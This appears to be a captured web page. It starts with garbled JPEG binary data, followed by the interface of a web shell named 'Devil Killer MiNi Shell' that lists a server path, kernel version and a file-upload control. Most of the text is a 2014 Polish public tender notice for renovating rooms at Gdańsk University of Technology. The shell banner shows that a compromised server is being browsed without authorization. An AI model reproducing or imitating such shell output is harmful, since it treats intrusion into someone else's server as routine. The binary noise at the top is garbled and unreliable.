JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140714/234672-N-2014.html

<p class="kh_header"><b>Gdańsk: Wykonanie remontu wybranych pomieszczeń w budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 234672 - 2014; data zamieszczenia: 14.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 61 52, faks +48 58 347 24 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu wybranych pomieszczeń w budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontu wybranych pomieszczeń w budynku A   Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej

2. Zakres prac obejmuje remont:
    - na parterze pomieszczenie  nr 23 i korytarz,
    - na poziomie 100 pomieszczenia nr 101, nr 107, nr 114, nr 116, 136,138
    - na poziomie 300 pomieszczenia nr 342, 344, 346, 349, 351, 353, 355.
    - na poziomie 600 pomieszczenia: nr 613, 614, 616, 618.
    - na poziomie 200 pomieszczenie nr 222

3. Wymagania dotyczące wykonywanych robót:
    - prace malarskie
    - posadzki i podłogi
    - ścianka działowa z płyt G/K
    - zabudowa z profili aluminiowych przeszklona z drzwiami wahadłowymi i nadświetlem nad  drzwiami

4. Dane liczbowe dla remontowanych pomieszczeń :
Budynek A
Powierzchnia pom.  23                  -  40,80m2
Powierzchnia pom. 101                 -  23,80m2
Powierzchnia pom. 107                 -  15,80m2
Powierzchnia pom. 114                 -  15,50m2
Powierzchnia pom. 116                 -  24,40m2
Powierzchnia pom. 136                 -  15,60m2
Powierzchnia pom. 138                 -  15,60m2
Powierzchnia pom 342                  -  15,50m2
Powierzchnia pom 344                  -  15,80m2
Powierzchnia pom 346                  -  15,50m2
Powierzchnia pom 349                  -  15,50m2
Powierzchnia pom 351                  -  15,50m2
Powierzchnia pom 353                  -  15,50m2
Powierzchnia pom 355                  -  32,40m2
Powierzchnia pom. 613                 -  33,50m2
Powierzchnia pom. 614                 -  24,00m2
Powierzchnia pom. 616                 -  23,70m2
Powierzchnia pom. 618                 -  40,70m2
Powierzchnia korytarza na parterze  -  244,40m2
Powierzchnia pom. 222                  - 53,30m2
Razem powierzchnia          696,80m2
Wysokość pomieszczeń wynosi 300cm. Wysokość korytarza do sufitu podwieszanego wynosi 272 cm. Remont pomieszczeń dotyczy prac wykończeniowych. Sposób użytkowania nie ulega zmianie.

5.	Opis i zakres prac przewidzianych do wykonania.

5.1. Zakres robót dla pomieszczenia nr 23:
- demontaż listew przypodłogowych,
- demontaż wykładziny podłogowej z płytek PCV 30x30cm klejonych do podłoża,
- naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, 
  odpornej na ścieranie gr P wg badań ITB, antypoślizgowej,
- wymiana 2 kratek wentylacyjnych w ścianie,
- demontaż istniejącej osłony ściany i wykonanie nowej osłony z płyty MDF z okleiną  naturalną,
- skucie tynku i wykonanie glazury wokół umywalki (umywalka nie podlega wymianie, bateria 
  umywalkowa i syfon podlega wymianie),
- wykonanie gładzi gipsowej na ścianach i suficie,
- wymalowanie pomieszczenia sufitu białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych farbą olejną,
5.2. Zakres robót dla pomieszczenia nr 101:
- rozebranie ściennej zabudowy z paneli,
- demontaż listew przypodłogowych,
- demontaż płytek podłogowych PCV 30x30cm klejonych do podłoża,
- naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm heterogenicznej zabezpieczonej 
  poliuretanem PUR, parkietopodobnej w dwóch kontrastujących kolorach (kolory zastosować wg 
  następującego podziału 1/3 + 2/3powierzchni podłogi).
- zamontowanie profilowanych listew przypodłogowych
- wymiana  kratki  wentylacyjnej w ścianie,
- skucie tynku i wykonanie glazury wokół umywalki (umywalka nie podlega wymianie, bateria 
  umywalkowa podlega wymianie),
- wykonanie gładzi gipsowej na ścianach i suficie,
- wymalowanie pomieszczenia sufitu białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych farbą olejną,
- wykonanie 2 ścianek przestawnych z profili aluminiowych o wymiarach 2,0 x 0,7m, połączonych ze 
  sobą listwami skręcanymi na śruby (listwy  z nawierconymi otworami na śruby mają umożliwić 
  ustawienie ścianek w różnych odległościach od siebie).

5.3. Zakres robót dla pomieszczenia nr 107:
- demontaż listew przypodłogowych,
- zerwanie wykładziny rulonowej,
- demontaż wykładziny podłogowej z płytek PCV 30x30cm klejonych do podłoża,
- naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm heterogenicznej zabezpieczonej 
  poliuretanem PUR, parkietopodobnej.
- zamontowanie profilowanych listew przypodłogowych
- wymianę kratki wentylacyjnej w ścianie,
- wykonanie gładzi gipsowej na ścianach i suficie,
- skucie tynku i wykonanie glazury wokół umywalki (umywalka nie podlega wymianie, wymianie 
  podlega bateria umywalkowa),
- wymalowanie pomieszczenia sufitu białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych farbą olejną,

5.4. Zakres robót dla pomieszczenia nr 114:
- wymiana kratki wentylacyjnej w ścianie,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych.

5.5. Zakres robót dla pomieszczenia nr 116:
- wymiana kratki wentylacyjnej w ścianie,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną
  w kolorze pastelowym,
- wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych.

5.6. Zakres robót dla pomieszczenia nr 342, nr 346, nr 349, nr 351, nr353, nr 355.
- demontaż listew przypodłogowych,
- demontaż wykładziny i płytek PCV 30x30cm klejonych do podłoża,
- skucie nierówności na podłodze i naprawa miejsc uszkodzonych,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, 
  odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, z wywinięciem wykładziny na ściany na 
  wys 10cm,  
- wymiana kratki wentylacyjnej w ścianie,
- wykonanie gładzi gipsowej na ścianach (okiennej i z drzwiami)i suficie, a w pomieszczeniu 355 
  na ścianie dzielącej pomieszczenie, 
- zabezpieczenie kątownikami aluminiowymi perforowanymi naroży zewnętrznych otworów okiennych
  i drzwiowych ,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym, malowanie ściany z płyt dźwiękochłonnych,
- wymalowanie farbą olejną: parapetów farbą białą , rur instalacyjnych i grzejników żebrowych w 
  kolorze ścian.

5.7. Zakres robót dla pomieszczenia nr 344.
- wymiana kratki wentylacyjnej w ścianie,
- wykonanie gładzi gipsowej na ścianach i suficie,
- zabezpieczenie kątownikami aluminiowymi perforowanymi naroży zewnętrznych otworów okiennych 
  i drzwiowych ,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną
  w kolorze pastelowym (ściany z oknem i ściany z drzwiami), malowanie ściany płyt 
  dżwiękochłonnych,
- wymalowanie farbą olejną: parapetów farbą białą , rur instalacyjnych i grzejników żebrowych 
  w kolorze ścian,

5.8. Zakres robót dla pomieszczenia nr 613:
- demontaż listew przypodłogowych,
- demontaż wykładziny z płytek PCV 30x30cm klejonych do podłoża,
- skucie nierówności na podłodze i naprawa miejsc uszkodzonych,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, 
  odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, z wywinięciem wykładziny na ściany na 
  wys 10cm,  
- wymiana kratki wentylacyjnej w ścianie,
- zamurowanie otworów wentylacyjnych pod parapetami okiennymi,
- wykonanie gładzi gipsowej na ścianach i suficie,
- zabezpieczenie kątownikami aluminiowymi perforowanymi naroży zewnętrznych otworów okiennych
  i drzwiowych ,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie farbą olejną: parapetów farbą białą , rur instalacyjnych i grzejników żebrowych
  w kolorze ścian,

5.9. Zakres robót dla pomieszczenia nr 614:
- demontaż listew przypodłogowych,
- demontaż paneli podłogowych i płytek PCV 30x30cm klejonych do podłoża,
- naprawa miejsc uszkodzonych posadzki i oczyszczenie podłoża,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, 
  odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, z wywinięciem wykładziny na ściany 
  na wys 10cm,
- wymiana kratki wentylacyjnej w ścianie,
- zamurowanie otworów wentylacyjnych pod parapetami okiennymi,
- wykonanie gładzi gipsowej na ścianach i suficie,
- zabezpieczenie kątownikami aluminiowymi perforowanymi naroży zewnętrznych otworów okiennych
  i drzwiowych,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną 
  w kolorze pastelowym,
- wymalowanie farbą olejną: parapetów w kolorze białym,  rur instalacyjnych i grzejników żebrowych 
   w kolorze ścian.

5.10. Zakres robót dla pomieszczenia nr 616:
- demontaż listwy przypodłogowej wzdłuż rozbieranej ściany,
- demontaż płytek wygłuszających z rozbieranej ściany,
- naprawa posadzki wzdłuż nowo wybudowane ściany,
- wykonanie gładzi gipsowej na nowej ścianie z płyt G/K,
- wokół wstawionego w ścianę okna wykonanie ramy z aluminiowego kątownika,
- malowanie ściany farbą emulsyjną trudno ścieralną w kolorze pastelowym,
- zamontowanie listwy przypodłogowej z drewna
- wykucie w ścianie otworu fi 100mm w celu przeprowadzenia kabli instalacyjnych.
Uwaga
W pomieszczeniu tym należy wykonać na czas wykonywania robot budowlanych tymczasową, szczelną zabudowę  w celu zabezpieczenia znajdujących się tam urządzeń przed zabrudzeniem i zapyleniem.

5.11. Zakres robót dla pomieszczenia nr 618:
- demontaż zabudowy meblowej,
- demontaż ściany działowej o konstrukcji z bali drewnianych obitych płytami,
- demontaż listew przypodłogowych,
- demontaż karniszy nad oknami,
- demontaż paneli podłogowych i płytek PCV 30x30cm klejonych do podłoża,
- demontaż płytek ściennych glazurowanych ze ściany i uzupełnienie w tym miejscu tynku,
- naprawa miejsc uszkodzonych i oczyszczenie podłoża pod posadzkę,
- zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
- wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm homogenicznej, antystatycznej, 
  odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, z wywinięciem wykładziny na ściany na 
  wys 10cm,
- wykonanie nowej ściany działowej  z płyt G/K wypełnionej wełna mineralną,
- wstawienie w nowej ścianie okna o wym 140x100cm
- wstawienie wokół wstawionego okna ramy z kątownika aluminiowego,
- wymiana kratek wentylacyjnych w ścianie,
- zamurowanie otworów wentylacyjnych pod parapetami okiennymi,
- zabezpieczenie wypukłych narożników ścian wokół okien i drzwi kątownikami aluminiowymi 
  perforowanymi,
- wykonanie gładzi gipsowej na ścianach i suficie,
- malowanie pomieszczenia: sufitów białą farbą emulsyjną, ścian farbą emulsyjną trudno ścieralną w 
  kolorze pastelowym,
- wymalowanie farbą olejną : na biało parapetów, w kolorze ścian - rury instalacyjne i grzejniki 
  żebrowe,
- zabezpieczenie korytek z przewodami przed zabrudzeniem i uszkodzeniem.  

5.12. Zakres robót dla korytarza na parterze:
- oczyszczenie ścian z pyłu i kurzu,
- oczyszczenie fragmentów stałej zabudowy sufitów z kurzu,
- demontaż cokołów z płytek gresowych,
- zagruntowanie ścian i części sufitów podkładem gruntującym pod tynk,
- wykonanie tynków mozaikowych, cienkowarstwowych na ścianach i części sufitów (tynku nie 
   wykonujemy na suficie podwieszanym z płyt 60x60 i 60x90cm),
- naprawienie sufitu podwieszanego: uzupełnienie elementów konstrukcji, wymiana uszkodzonych płyt 
   ok. 20m2,
- zamontowanie na krawędziach wypukłych ścian kątowników ze stali nierdzewnej,
- w miejsce usuniętych cokołów przypodłogowych zamontować cokoły o wys 100mm ze stali 
   nierdzewnej kwasoodpornej,
- zamontowanie drzwi aluminiowych, wahadłowych, przeszklonych, z naświetlem nad drzwiami,
- uzupełnienie fug pomiędzy płytami ściennymi 60*60cm, z wymianą płyt uszkodzonych ok. 10szt,
- wymalowanie farbą olejną na biało parapetów okiennych i grzejników w kolorze ścian.

5.13. Zakres robót dla pomieszczenia nr 222:
-	demontaż listew przypodłogowych,
-	demontaż wykładziny z płytek PCV 30x30cm klejonych do podłoża,
-	skucie nierówności na podłodze i naprawa miejsc uszkodzonych,
-	 zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod
 nową posadzkę,
-	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm
homogenicznej, antystatycznej, odpornej na ścieranie gr P wg badań ITB, antypoślizgowej, z wywinięciem wykładziny na ściany na wys 10cm,
-        zamontowanie listwy podłogowej wzdłuż ściany zabudowanej płytami drewnianymi

5.14. Zakres robót dla pomieszczenia nr 136:
-	demontaż listew przypodłogowych,
-	demontaż paneli podłogowych,
-	naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki,
-	zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
-	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm
 heterogenicznej zabezpieczonej poliuretanem PUR, parkietopodobnej, 
-	zamontowanie profilowanych listew przypodłogowych
-	wymiana  kratki  wentylacyjnej w ścianie,
-	demontaż umywalki, baterii i podejść wod-kann,
-	skucie płytek ściennych z glazury o wym 15x15cm i wykonanie  nowych o wym 20x30cm wokół zlewu  - zabudowa 120cn na 150cm
-	wykonanie nowych podeśc wod-kann,
-	wykonanie gładzi gipsowej na ścianach i suficie,
-	wymalowanie pomieszczenia sufitu białą farbą emulsyjną, ścian farbą emulsyjną
trudno ścieralną w kolorze pastelowym,
-	wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych farbą olejną,

5.15. Zakres robót dla pomieszczenia nr 138:
-	demontaż listew przypodłogowych,
-	demontaż paneli podłogowych,
-	naprawa miejsc uszkodzonych i oczyszczenie podłoża posadzki,
-	zagruntowanie podłoża i wykonanie warstwy z masy samopoziomującej pod nową posadzkę,
-	wykonanie nowej posadzki z wykładziny rulonowej PCV gr min 2mm
heterogenicznej zabezpieczonej poliuretanem PUR, parkietopodobnej 
zamontowanie profilowanych listew przypodłogowych
-	wymiana  kratki  wentylacyjnej w ścianie,
skucie glazury na ścianie  i wykonanie w tym miejscu tynku
-	demontaż umywalki, baterii i podejść wod- kann.
-	wykonanie gładzi gipsowej na ścianach i suficie,
-	wymalowanie pomieszczenia sufitu białą farbą emulsyjną, ścian farbą emulsyjną
trudno ścieralną w kolorze pastelowym,
-	wymalowanie parapetów, rur instalacyjnych i grzejników żebrowych farbą olejną,

Bezużyteczne elementy i materiały z wszystkich remontowanych pomieszczeń powinny być wywiezione na wysypisko.


Branża elektryczna 
- Rozdział energii i rozdzielnice
- Remont instalacji oświetlenia ogólnego 
- Instalacje gniazd wtyczkowych 230V
- Instalacje zestawów gniazd komputerowych
- Instalacje telefoniczne
- Ochronę od porażeń

Przedmiot zamówienia określa:
1.	Dokumentacja projektowa, na którą składa się: 
-   Zmodyfikowany Projekt techniczny - branża budowlana - wersja 2
-  Zmodyfikowany Projekt budowlano-wykonawczy  - branża elektryczna
-   Przedmiary robót branża budowlana
    a)przedmiar robót pomieszczenie nr 23 
    b) przedmiar robót pomieszczenie  nr 101
    c) przedmiar robót pomieszczenie  nr 107
    d) przedmiar robót pomieszczenie  nr 114
    e) przedmiar robót pomieszczenie  nr 116
    f) przedmiar robót pomieszczenie  nr 613
    g) przedmiar robót pomieszczenie  nr 614
    h) przedmiar robót pomieszczenie  nr 616
    i) przedmiar robót pomieszczenie  nr 618
    j) przedmiar robót - korytarz na parterze
    k) przedmiar robót pomieszczenie  nr 342
    l) przedmiar robót pomieszczenie  nr 344
    ł) przedmiar robót pomieszczenie  nr 346
    m) przedmiar robót pomieszczenie  nr 349
    n) przedmiar robót pomieszczenie  nr 351
    o) przedmiar robót pomieszczenie  nr 353
    p) przedmiar robót pomieszczenie  nr 355
    r) przedmiar robót pomieszczenie nr 222
    s) przedmiar robót pomieszczenie nr 136
    t) przedmiar robót pomieszczenie nr 138
-   Przedmiar robót branża elektryczna
-   Zmodyfikowany Przedmiar robót branża elektryczna 
-   STWiORB - część I i II 

Zamawiający wymaga, aby Wykonawca udzielił 36-miesięcznej gwarancji na wykonane roboty (licząc od daty podpisania protokołu końcowego i odbioru robót).
Zamawiający zaleca aby Wykonawca przed sporządzeniem oferty przeprowadził wizję lokalną                          w terenie po uprzednim telefonicznym uzgodnieniu terminu z osobą wyznaczoną do kontaktu.
Na planie sytuacyjnym Politechniki Gdańskiej budynek oznaczony jest numerem 21..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem przystąpienia do przetargu jest wniesienie, przed upływem terminu składania ofert, wadium w wysokości  7 000,00 zł (słownie: siedem tysięcy złotych 00/100). 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	w pieniądzu 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,               z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275)
3.	Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy Zamawiającego 	nr 64 1160 2202 0000 0001 8607 3782, w Banku Millennium, z dopiskiem: Remont wybranych pomieszczeń w budynku A WETI PG.
Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert tj. do dnia 29-07- 2014 r., do godz. 0945.
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę nie jest warunkiem koniecznym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
4.	Wadium wnoszone w jednej z form określonych w pkt 2 ppkt 2) - 5) następuje poprzez  zdeponowanie za pokwitowaniem oryginału dokumentu w Kwesturze Politechniki Gdańskiej,                  I piętro Gmachu B PG w Gdańsku, przy ul. G. Narutowicza 11/12, w dniach od poniedziałku do piątku, w godz. 900 do 1300 lub przesłanie pocztą na adres Kwestura Politechniki Gdańskiej,                   ul. G. Narutowicza 11/12, 80-233 Gdańsk.
Wadium wniesione w jednej z form określonych w pkt 2 ppkt 2) - 5) Zamawiający będzie uważał za skuteczne tylko wówczas, gdy w terminie najpóźniej składania ofert tj. do dnia                                29 -07 - 2014 r., do godz. 0945. , Zamawiający otrzyma stosowny dokument. 
5.	Dokument wadialny (poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)	nazwę oraz wskazanie siedziby: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczyciela (Zamawiającego), oraz gwaranta/poręczyciela (banku; instytucji ubezpieczeniowej lub podmiotu poręczającego)
2)	określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy 
3)	kwotę 
4)	termin ważności 
5)	mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne żądanie Zamawiającego, 
6)	być nieodwołalny, 
7)	obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a, 5 ustawy PZP, 
a także obejmować cały okres związania ofertą, określony w specyfikacji.
6.	Zamawiający dokona zwrotu wadium wszystkim Wykonawcom zgodnie z art. 46 ust. 1 do 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w niniejszym postępowaniu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał min. 2 roboty w budynkach użyteczności publicznej, odpowiadające swym zakresem przedmiotowi zamówienia na łączną wartość co najmniej 
240 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
